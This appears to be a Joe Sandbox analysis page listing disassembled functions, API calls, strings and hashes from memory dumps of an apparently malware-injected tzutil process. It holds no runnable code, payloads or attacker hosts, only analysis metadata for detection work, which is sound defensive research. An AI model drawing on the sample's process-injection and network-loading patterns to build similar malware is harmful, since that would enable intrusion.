Source File: 00000009.00000002.4628630442.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true

Associated: 00000009.00000002.4628630442.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.4628630442.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.4628630442.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_30d0000_tzutil.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 16e76e186852cf7a83bb09e282f8af9312379cb60a2d76afe0b79cf4d1258af6
Instruction ID: b86901433d9e28b6ce70228fa7b0a1deb04aaefe3cb6c099b77d5d98996e0472
Opcode Fuzzy Hash: 16e76e186852cf7a83bb09e282f8af9312379cb60a2d76afe0b79cf4d1258af6
Instruction Fuzzy Hash: 4990023130140843D100B6989508646000587E4301F55E011B9125555EC76589916531

Function 031435C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 031435CA

Memory Dump Source

Source File: 00000009.00000002.4628630442.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true

Associated: 00000009.00000002.4628630442.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.4628630442.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.4628630442.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_30d0000_tzutil.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6fe86e67674642dd5fcffbb2052704c232740caeab3544a05995d5fce9b4432c
Instruction ID: d09237ce8c9b04f96cab15f2d49ee141efc9f31f5cbaf97d129cd958293f5348
Opcode Fuzzy Hash: 6fe86e67674642dd5fcffbb2052704c232740caeab3544a05995d5fce9b4432c
Instruction Fuzzy Hash: 3D90023170550843D100B2588614706100587D4201F65D411B4525568D87958A5169A2

Function 031439B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 031439BA

Memory Dump Source

Source File: 00000009.00000002.4628630442.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true

Associated: 00000009.00000002.4628630442.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.4628630442.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.4628630442.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_30d0000_tzutil.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c47e786a890a524c543bbe87161c82a2ea21cc417cddc3a7282aae48ac9b92cf
Instruction ID: 206fee6b86b97dbde1b484679f74e47213d2f6e17d41ccca39f0a48cd7c1b0a6
Opcode Fuzzy Hash: c47e786a890a524c543bbe87161c82a2ea21cc417cddc3a7282aae48ac9b92cf
Instruction Fuzzy Hash: 9390022134545543D150B25C85046164005A7E4201F55D021B4915594D875589556621

Function 005A0DE0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(q3a81SS,00000111,00000000,00000000), ref: 005A0E57

Strings

q3a81SS, xrefs: 005A0E5E, 005A0E61
q3a81SS, xrefs: 005A0E4C, 005A0E56, 005A0E67

Memory Dump Source

Source File: 00000009.00000002.4620677236.0000000000590000.00000040.80000000.00040000.00000000.sdmp, Offset: 00590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_590000_tzutil.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: q3a81SS$q3a81SS
API String ID: 1836367815-3972413748
Opcode ID: ef0ac9acd1043bbbe08245aa08fca33b1428ecc5538c6eb8bed5ce3344129614
Instruction ID: 734208cc0e86ee4c006ed4f03063c61f6868887065ff570d524fcebcafde34f9
Opcode Fuzzy Hash: ef0ac9acd1043bbbe08245aa08fca33b1428ecc5538c6eb8bed5ce3344129614
Instruction Fuzzy Hash: 9701C472D4020D7AEB10AAE58C82DEF7F7CFF81794F048064FA0467141E6689E064BA1

Function 005B3B40 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 005B3C1B

Strings

wininet.dll, xrefs: 005B3BAE, 005B3BBA
net.dll, xrefs: 005B3BD3, 005B3C66, 005B3C46, 005B3C52, 005B3C72

Memory Dump Source

Source File: 00000009.00000002.4620677236.0000000000590000.00000040.80000000.00040000.00000000.sdmp, Offset: 00590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_590000_tzutil.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 6e588402b97e3ba5d64bd9ade44943791f9a97fb1fde5444bed34266deda913b
Instruction ID: 96056ca1774a05f22ef482e303e13bd931cf31e8c1fad032f555ab900ff32f24
Opcode Fuzzy Hash: 6e588402b97e3ba5d64bd9ade44943791f9a97fb1fde5444bed34266deda913b
Instruction Fuzzy Hash: 8831A0B1940206BBDB14DFA0CC85FEBBBB9FF88310F00452CB61A6B241D7747A408BA4

Function 005AF59A Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 104COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 005AF5B7
CoUninitialize.COMBASE ref: 005AF69E

Strings

@J7<, xrefs: 005AF5CB

Memory Dump Source

Source File: 00000009.00000002.4620677236.0000000000590000.00000040.80000000.00040000.00000000.sdmp, Offset: 00590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_590000_tzutil.jbxd

Yara matches

Similarity

API ID: InitializeUninitialize
String ID: @J7<
API String ID: 3442037557-2016760708
Opcode ID: db7756ed07b7d45786f5ee09032a813491603bb3784a3f83a86d76358ad511e1
Instruction ID: 32403fb4ce4871a5ef88d22c90bec2c75cfbcb5ea785414e3458f1145a839395
Opcode Fuzzy Hash: db7756ed07b7d45786f5ee09032a813491603bb3784a3f83a86d76358ad511e1
Instruction Fuzzy Hash: 4C312175A0020AAFDB10DFE8D8809EFB7B9FF89304B108569E505EB214D775EE458BA0

Function 005AF5A0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 005AF5B7
CoUninitialize.COMBASE ref: 005AF69E

Strings

@J7<, xrefs: 005AF5CB

Memory Dump Source

Source File: 00000009.00000002.4620677236.0000000000590000.00000040.80000000.00040000.00000000.sdmp, Offset: 00590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_590000_tzutil.jbxd

Yara matches

Similarity

API ID: InitializeUninitialize
String ID: @J7<
API String ID: 3442037557-2016760708
Opcode ID: 7f8f1e308f3ba2e7496c02f17328c33bdbccb25ec2fc71d6cb32a72f826d532a
Instruction ID: a176e7d2ed0c0eac896e7386579d3447584bf1143f6affbf5cba7a1cdcec19b3
Opcode Fuzzy Hash: 7f8f1e308f3ba2e7496c02f17328c33bdbccb25ec2fc71d6cb32a72f826d532a
Instruction Fuzzy Hash: 03313EB5A0020AAFDB10DFD8DC809EFB7B9FF89304B108559E505EB214D775EE058BA0

Function 005A45B0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 005A4622

Memory Dump Source

Source File: 00000009.00000002.4620677236.0000000000590000.00000040.80000000.00040000.00000000.sdmp, Offset: 00590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_590000_tzutil.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: d20514dbed541711f06c5f50188ee8c907cd2a4cac65204c9f39392a3faeb9f2
Instruction ID: d89fbc7ebae95459b59e753b8cb32895f40d753baac2f86c35af8329e8f1e6a0
Opcode Fuzzy Hash: d20514dbed541711f06c5f50188ee8c907cd2a4cac65204c9f39392a3faeb9f2
Instruction Fuzzy Hash: 55011EB5D0020EBBDF10EBE4DC46FDDBB78AB94308F044195A908A7241FA71EB18CB91

Function 005B97B0 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,?,?,?,005A83CE,00000010,?,?,?,00000044,?,00000010,005A83CE,?,?,?), ref: 005B9810

Memory Dump Source

Source File: 00000009.00000002.4620677236.0000000000590000.00000040.80000000.00040000.00000000.sdmp, Offset: 00590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_590000_tzutil.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: b9430d4237b192487147af20d7dda05c988cec88c93a14eea5518fce71c42fe1
Instruction ID: 7411bc41292631e43f068e63b54dd3f2da827963eb0f8da68cc203529c4bc7dc
Opcode Fuzzy Hash: b9430d4237b192487147af20d7dda05c988cec88c93a14eea5518fce71c42fe1
Instruction Fuzzy Hash: 0001C0B2204609BBCB44DE99DC81EEB77ADAF8C714F418208BA0DE3240D630F8518BA4

Function 00599B20 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00599B65

Memory Dump Source

Source File: 00000009.00000002.4620677236.0000000000590000.00000040.80000000.00040000.00000000.sdmp, Offset: 00590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_590000_tzutil.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: a7bc8f20659032d34348255361d67467cb615589764db8e390f7be8e7336fe6f
Instruction ID: e6580dcd4443ddbe39d45b14d751c6aa14e8015602bb23a47beffda1d5347455
Opcode Fuzzy Hash: a7bc8f20659032d34348255361d67467cb615589764db8e390f7be8e7336fe6f
Instruction Fuzzy Hash: F1F0657339061536E63065A9AC03FDB7A4CEBC1761F540029F70DEB1C1D995B84142ED

Function 00599B1C Relevance: 1.5, APIs: 1, Instructions: 33threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00599B65

Memory Dump Source

Source File: 00000009.00000002.4620677236.0000000000590000.00000040.80000000.00040000.00000000.sdmp, Offset: 00590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_590000_tzutil.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 981281d043514726e25c31a98c89ff1bcae5a13ffebd198eeb89110d4352a97b
Instruction ID: 645458d06f4912f1ca9ac5c47bf1a994fe5e00737db835de12f71c064cb76433
Opcode Fuzzy Hash: 981281d043514726e25c31a98c89ff1bcae5a13ffebd198eeb89110d4352a97b
Instruction Fuzzy Hash: 6CE0927279061136EA3065A99C03FDB6E5CEFC5B61F540019F709AB1C1E9A5B84082ED

Function 005B96E0 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,?,00000000,00000000,?,00000000,?,?,005B185C,?), ref: 005B971C

Memory Dump Source

Source File: 00000009.00000002.4620677236.0000000000590000.00000040.80000000.00040000.00000000.sdmp, Offset: 00590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_590000_tzutil.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 866ad238b9475ed576715e4d4bc55d68e1c652e5d4aff164c9ce62ae2b67d712
Instruction ID: 3d8f1c2d701cc972866478c6640c599b7f3771f05ec9e021c8b901f86b16f45c
Opcode Fuzzy Hash: 866ad238b9475ed576715e4d4bc55d68e1c652e5d4aff164c9ce62ae2b67d712
Instruction Fuzzy Hash: 2AE09A72200B057FDA20EE58DC4AF9B37ACEFC8710F004408F909A7281E730B9108BB9

Function 005B9730 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000000,00000004,00000000,C103CA33,00000007,00000000,00000004,00000000,005A3E29,000000F4), ref: 005B9769

Memory Dump Source

Source File: 00000009.00000002.4620677236.0000000000590000.00000040.80000000.00040000.00000000.sdmp, Offset: 00590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_590000_tzutil.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 4fc3ec8936f6b1931ceba89b590bfce49c52afe1fdc88f053dc06a18979b8893
Instruction ID: bc76ba6dcc2e9ca5c5dd457c2c1baa4365225f465623c11902a50829acb0d3b8
Opcode Fuzzy Hash: 4fc3ec8936f6b1931ceba89b590bfce49c52afe1fdc88f053dc06a18979b8893
Instruction Fuzzy Hash: 61E092722002057FDA20EF48DC45E9B77ACEFC8710F004418F908A7241D631B911C7B5

Function 005A8410 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 005A843C

Memory Dump Source

Source File: 00000009.00000002.4620677236.0000000000590000.00000040.80000000.00040000.00000000.sdmp, Offset: 00590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_590000_tzutil.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 5414b0788fa95a7c7f93d45f5a014221ac48396c32e4d8352a3644f5e36590f5
Instruction ID: e5b52478e9377b12d6e94ee4b7e8408b07e2ad3fda73d51f2919727b7ec2c406
Opcode Fuzzy Hash: 5414b0788fa95a7c7f93d45f5a014221ac48396c32e4d8352a3644f5e36590f5
Instruction Fuzzy Hash: 7FE0D87129020527FE2069689C45B753748A749734F440560BA1C8B6C1E974F8114159

Function 005A8409 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 005A843C

Memory Dump Source

Source File: 00000009.00000002.4620677236.0000000000590000.00000040.80000000.00040000.00000000.sdmp, Offset: 00590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_590000_tzutil.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: f16c07411372fa0df9329810ce808da6b9861832402ca5822e5c5177a8ac0dc0
Instruction ID: c956547e4d146b2de63e6b9e5934b0708caf1234ab67342139c370bd6340fa44
Opcode Fuzzy Hash: f16c07411372fa0df9329810ce808da6b9861832402ca5822e5c5177a8ac0dc0
Instruction Fuzzy Hash: 31E022716402062BFB20AA34CC45FBA3B14BB8A374F484694B9589B2C2EA74E8428208

Function 005A8200 Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,005A1D80,005B807E,>W[,005A1D46), ref: 005A8233

Memory Dump Source

Source File: 00000009.00000002.4620677236.0000000000590000.00000040.80000000.00040000.00000000.sdmp, Offset: 00590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_590000_tzutil.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 2b7fb5ed27da2e51a8166899056f3c3a9c877a5395a0e2b1048a315926923c51
Instruction ID: 076860e610ea91615d8480255765c95fbc7e66c2bb668d7428be41a355ae724d
Opcode Fuzzy Hash: 2b7fb5ed27da2e51a8166899056f3c3a9c877a5395a0e2b1048a315926923c51
Instruction Fuzzy Hash: 67D05E716D02073BFE40AAA49C0FF6A3A8CAF957A0F454064BA4CD72C3EC65F510467D

Function 005A81F7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,005A1D80,005B807E,>W[,005A1D46), ref: 005A8233

Memory Dump Source

Source File: 00000009.00000002.4620677236.0000000000590000.00000040.80000000.00040000.00000000.sdmp, Offset: 00590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_590000_tzutil.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 3e25d6b1ca750c273bd00f13019b49817918602393bc8a50d1b197411348199e
Instruction ID: 5fd2404f4c6f706c1ee5069e363c7340d6cf360cbc1d8a492b0bdf820b59032e
Opcode Fuzzy Hash: 3e25d6b1ca750c273bd00f13019b49817918602393bc8a50d1b197411348199e
Instruction Fuzzy Hash: A8B0122E3D45031AF910F4F03C057FE138677E1B90F414010B50CC88C0ED5240010400

Function 03142C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03142C24

Memory Dump Source

Source File: 00000009.00000002.4628630442.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true

Associated: 00000009.00000002.4628630442.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.4628630442.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.4628630442.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_30d0000_tzutil.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f1397c18bdaaeb6435ca11316d733a1a09152124b47f80d7b3e27198a3804bf7
Instruction ID: 6cb4371fa7d4e572c5d13b1424c38349f62ce303468b98e652b307a83b2a5e57
Opcode Fuzzy Hash: f1397c18bdaaeb6435ca11316d733a1a09152124b47f80d7b3e27198a3804bf7
Instruction Fuzzy Hash: 0FB09B719015C5C7DA11E7604708717790467D4701F29C461F2130641E4779C1D1E575

Non-executed Functions

Function 02EB04E4 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4627986406.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2eb0000_tzutil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4af1af35b1bd79f43bb66c920feec1f3c1412414ca9f900c685f3679ae23f4e5
Instruction ID: c57ee0095682a138371e1cf6441652dcaf0bf511108ec78e90fa3e0b6dfa043a
Opcode Fuzzy Hash: 4af1af35b1bd79f43bb66c920feec1f3c1412414ca9f900c685f3679ae23f4e5
Instruction Fuzzy Hash: 71411530649B094FD328AEA8D0816B7B3E2FF45314F50A62DD88AC3652EB70E8068785

Function 02EBE009 Relevance: 56.5, Strings: 45, Instructions: 249COMMON

Download Yara Rule

Strings

4567, xrefs: 02EBE08A
@@@@, xrefs: 02EBE163
@@@@, xrefs: 02EBE16A
@@@@, xrefs: 02EBE09F
@@@@, xrefs: 02EBE1B0
@@@@, xrefs: 02EBE14E
%&'(, xrefs: 02EBE0F3
@@@@, xrefs: 02EBE1A2
!"#$, xrefs: 02EBE0EC
@@@?, xrefs: 02EBE083
@@@@, xrefs: 02EBE12B
@@@@, xrefs: 02EBE17F
@@@@, xrefs: 02EBE10F
@@@@, xrefs: 02EBE11D
123@, xrefs: 02EBE108
@@@@, xrefs: 02EBE0D7
@@@@, xrefs: 02EBE124
@@@@, xrefs: 02EBE1D3
?, xrefs: 02EBE200
@@@@, xrefs: 02EBE139
@@@@, xrefs: 02EBE116
)*+,, xrefs: 02EBE0FA
<=@@, xrefs: 02EBE098
@@@@, xrefs: 02EBE171
@@@@, xrefs: 02EBE1E1
@@@@, xrefs: 02EBE140
@@@@, xrefs: 02EBE132
@@@@, xrefs: 02EBE1EF
@@@@, xrefs: 02EBE194
@@@@, xrefs: 02EBE19B
@@@@, xrefs: 02EBE1CC
@@@@, xrefs: 02EBE186
@@@@, xrefs: 02EBE1BE
@@@@, xrefs: 02EBE1A9
@@@@, xrefs: 02EBE1E8
@@@@, xrefs: 02EBE178
@@@@, xrefs: 02EBE1DA
@@@@, xrefs: 02EBE1C5
89:;, xrefs: 02EBE091
-./0, xrefs: 02EBE101
@@@@, xrefs: 02EBE1B7
@@@@, xrefs: 02EBE147
@@@@, xrefs: 02EBE18D
@@@@, xrefs: 02EBE15C
@@@@, xrefs: 02EBE155

Memory Dump Source

Source File: 00000009.00000002.4627986406.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2eb0000_tzutil.jbxd

Similarity

API ID:
String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
API String ID: 0-3558027158
Opcode ID: e696790ba4092f556cde5174688e67ab53f88a90c658e0651f9da09df1d8fefc
Instruction ID: 70626918df49dfe2a01c12b314553d8e55b7c81b9c96452346798946187ab8c0
Opcode Fuzzy Hash: e696790ba4092f556cde5174688e67ab53f88a90c658e0651f9da09df1d8fefc
Instruction Fuzzy Hash: F5A150F04483948AC7198F58A0652AFFFB1EBC6305F15816DE6E6BB243C37E8905CB95

Function 03142890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0314293C
___swprintf_l.LIBCMT ref: 0314295E
___swprintf_l.LIBCMT ref: 031429A3
___swprintf_l.LIBCMT ref: 0317A52E

Strings

ffff:, xrefs: 0317A504
::ffff:0:%u.%u.%u.%u, xrefs: 0317A54E
:%u.%u.%u.%u, xrefs: 0317A5B8
::%hs%u.%u.%u.%u, xrefs: 0317A527

Memory Dump Source

Source File: 00000009.00000002.4628630442.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true

Associated: 00000009.00000002.4628630442.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.4628630442.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.4628630442.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_30d0000_tzutil.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 1ca42dfc5d804588379df30ef658b6ad1de99241935830ebc999869e25f4d9d4
Instruction ID: 7dbb6684a72f98211b974049ba2b2294b9f90c66cd4089cf18564028916c1703
Opcode Fuzzy Hash: 1ca42dfc5d804588379df30ef658b6ad1de99241935830ebc999869e25f4d9d4
Instruction Fuzzy Hash: 5851C7B6A00216BFCB24DF98C89097EFBF8BF0D2407188669F465D7641D374DE818BA0

Function 031B2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 031B24A6
___swprintf_l.LIBCMT ref: 031B24E2
___swprintf_l.LIBCMT ref: 031B257D
___swprintf_l.LIBCMT ref: 031B25A3
___swprintf_l.LIBCMT ref: 031B25C8
___swprintf_l.LIBCMT ref: 031B2608

Strings

ffff:, xrefs: 031B247D, 031B249D
:%u.%u.%u.%u, xrefs: 031B25FF
::%hs%u.%u.%u.%u, xrefs: 031B249E
::ffff:0:%u.%u.%u.%u, xrefs: 031B24DA

Memory Dump Source

Source File: 00000009.00000002.4628630442.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true

Associated: 00000009.00000002.4628630442.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.4628630442.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.4628630442.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_30d0000_tzutil.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: ef9bd0a4a83f91995d510a361bc874aefee82a8acbca9decaf398b59ed99de3c
Instruction ID: d991d5bb887df1395e1b0127ed2ea9116a968714bcbbef313a158dcc86489209
Opcode Fuzzy Hash: ef9bd0a4a83f91995d510a361bc874aefee82a8acbca9decaf398b59ed99de3c
Instruction Fuzzy Hash: 0D51F5B5A00645AFCB34DF9CC8909FFB7FDAB4C200B048899E5A5C7A41D7B4DA458760

Function 03137630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03174725
ExecuteOptions, xrefs: 031746A0
Execute=1, xrefs: 03174713
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03174655
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03174742
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 031746FC
CLIENT(ntdll): Processing section info %ws..., xrefs: 03174787

Memory Dump Source

Source File: 00000009.00000002.4628630442.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true

Associated: 00000009.00000002.4628630442.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.4628630442.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.4628630442.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_30d0000_tzutil.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 1c918f9f52c20a0392f402f7ebe7d22f5c6c6f11d3cba0f61c97821484203b8d
Instruction ID: 937a48edb25d0eeee7e51bb72125d6316ebc1a96f309eab07337001d6a8cb791
Opcode Fuzzy Hash: 1c918f9f52c20a0392f402f7ebe7d22f5c6c6f11d3cba0f61c97821484203b8d
Instruction Fuzzy Hash: A851F6B5A403196FEF15EBA5EC99FAD77B9EF0D300F0800A9E505AB1C1DB709A858F50

Function 0314B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 0314B6BF

Strings

+, xrefs: 0314B65A
0, xrefs: 0314B66F
0, xrefs: 0314B695
-, xrefs: 0314B650

Memory Dump Source

Source File: 00000009.00000002.4628630442.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true

Associated: 00000009.00000002.4628630442.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.4628630442.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.4628630442.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_30d0000_tzutil.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction ID: 5dfcb9bf5b5bd5141c755bb6abe1f7baa10cb76536d39aff0417e0bf73353ac8
Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction Fuzzy Hash: 13818E74E092499BDF28CF68C9917AEBBA6AF4D320F1CC159D891A73D1C734D8818B54

Function 031B20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 031B214F
___swprintf_l.LIBCMT ref: 031B2172

Strings

%%%u, xrefs: 031B2146
[, xrefs: 031B212B
]:%u, xrefs: 031B2169

Memory Dump Source

Source File: 00000009.00000002.4628630442.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true

Associated: 00000009.00000002.4628630442.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.4628630442.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.4628630442.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_30d0000_tzutil.jbxd

Similarity

API ID: ___swprintf_l
